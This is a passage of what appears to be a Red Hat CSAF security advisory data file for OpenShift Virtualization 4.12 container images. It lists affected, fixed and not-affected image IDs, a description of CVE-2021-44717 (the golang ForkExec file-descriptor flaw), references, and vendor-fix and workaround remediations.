"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: limit growth of header canonicalization cache", }, { cve: "CVE-2021-44717", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030806", }, ], notes: [ { category: "description", text: "There's a flaw in golang's syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: don't close fd 0 on ForkExec error", title: "Vulnerability summary", }, { category: "other", text: "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw's impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44717", }, { category: "external", summary: "RHBZ#2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44717", url: "https://www.cve.org/CVERecord?id=CVE-2021-44717", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "workaround", details: "This bug can be mitigated by raising the per-process file descriptor limit.", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", 